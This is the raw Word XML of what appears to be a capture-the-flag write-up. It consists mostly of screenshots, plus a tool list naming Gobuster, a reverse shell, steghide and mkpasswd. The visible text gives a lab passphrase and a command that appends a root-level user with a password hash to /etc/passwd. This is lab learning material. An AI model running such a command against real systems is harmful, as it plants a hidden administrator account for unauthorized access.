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23E" w:rsidRDefault="00E56E87">
      <w:r w:rsidRPr="00E56E87">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D3E4609" wp14:editId="0F0D2807">
            <wp:extent cx="5943600" cy="2258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proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>,reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">-shell, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hexeditor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>steghide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mkpasswd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00E56E87" w:rsidRDefault="00E56E87"/>
    <w:p w:rsidR="00E56E87" w:rsidRDefault="00E56E87">
      <w:r w:rsidRPr="00E56E87">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2158A32A" wp14:editId="5CD7C657">
            <wp:extent cx="5943600" cy="3832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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46B0BADB" wp14:editId="781033A4">
            <wp:extent cx="5943600" cy="3463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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7182F9BA" wp14:editId="03B7E2CA">
            <wp:extent cx="5706271" cy="115268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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F4CE677" wp14:editId="2CACC873">
            <wp:extent cx="5943600" cy="43745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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64EC159E" wp14:editId="3F98C393">
            <wp:extent cx="5943600" cy="6029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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32916880" wp14:editId="59DD0DEF">
            <wp:extent cx="4839375" cy="2686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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13EAAEA0" wp14:editId="70F7A152">
            <wp:extent cx="2610214" cy="50489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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D03BDC9" wp14:editId="795E5C74">
            <wp:extent cx="5506085" cy="4562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29" cy="456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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04160A4D" wp14:editId="5A78A8AA">
            <wp:extent cx="5943600" cy="1908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/>
    <w:p w:rsidR="00E56E87" w:rsidRDefault="00E56E87">
      <w:r w:rsidRPr="00E56E87">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79A08476" wp14:editId="7F7CBD5A">
            <wp:extent cx="5420481" cy="1181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E56E87">
      <w:r w:rsidRPr="00E56E87">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="528A47EC" wp14:editId="1DF5FF8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48320" cy="514422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E87" w:rsidRDefault="00E56E87"/>
    <w:p w:rsidR="00E56E87" w:rsidRDefault="00E56E87"/>
    <w:p w:rsidR="00E56E87" w:rsidRDefault="00E56E87">
      <w:r w:rsidRPr="00E56E87">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="432A95AD" wp14:editId="504C4445">
            <wp:extent cx="3877216" cy="315321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E56E87">
      <w:r w:rsidRPr="00E56E87">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16D6B2EC" wp14:editId="459AC27A">
            <wp:extent cx="5943600" cy="27768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0B03E0">
      <w:r>
        <w:t>Enter passphrase:</w:t>
      </w:r>
      <w:r w:rsidRPr="000B03E0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B03E0">
        <w:t>AllmightForEver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000B03E0">
        <w:t>!!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B03E0" w:rsidRDefault="000B03E0">
      <w:r w:rsidRPr="000B03E0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25BF3016" wp14:editId="4E015766">
            <wp:extent cx="5943600" cy="1511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0B03E0">
      <w:r w:rsidRPr="000B03E0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42BA8472" wp14:editId="6C209A1E">
            <wp:extent cx="5943600" cy="17087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0B03E0">
      <w:r w:rsidRPr="000B03E0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73E203DF" wp14:editId="5FE6F8D3">
            <wp:extent cx="5943600" cy="1377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0B03E0">
      <w:r w:rsidRPr="000B03E0">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40B9D8E7" wp14:editId="03475309">
            <wp:extent cx="5943600" cy="2896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0B03E0">
      <w:r w:rsidRPr="000B03E0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="566AF2B3" wp14:editId="3C032ED1">
            <wp:extent cx="3772426" cy="857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E0" w:rsidRDefault="000B03E0">
      <w:r w:rsidRPr="000B03E0">
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000B03E0">
        <w:t>rst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000B03E0">
        <w:t>:$1$QJTaofG3$.ESJStYmhrz4f3YRrblRo/:0:0:rst:/root:/bin/bash' &gt;&gt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B03E0">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000B03E0">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B03E0">
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="000B03E0" w:rsidRDefault="000B03E0">
      <w:r w:rsidRPr="000B03E0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="282C476A" wp14:editId="32F0D972">
            <wp:extent cx="5943600" cy="14725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7" w:rsidRDefault="000B03E0">
      <w:r w:rsidRPr="000B03E0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="253521C2" wp14:editId="6E6470FC">
            <wp:extent cx="3705742" cy="103837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E87">
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B03E0" w:rsidRDefault="000B03E0">
      <w:r w:rsidRPr="000B03E0">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1212328E" wp14:editId="0CB11834">
            <wp:extent cx="5943600" cy="3470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6E87" w:rsidRDefault="00E56E87"/>
    <w:p w:rsidR="00E56E87" w:rsidRDefault="00E56E87"/>
    <w:sectPr w:rsidR="00E56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CAD"/>
    <w:rsid w:val="000B03E0"/>
    <w:rsid w:val="00645CAD"/>
    <w:rsid w:val="00E3623E"/>
    <w:rsid w:val="00E5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9D6EB-C28B-49BF-85B4-CE357F71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2025-02-06T13:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-06T14:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>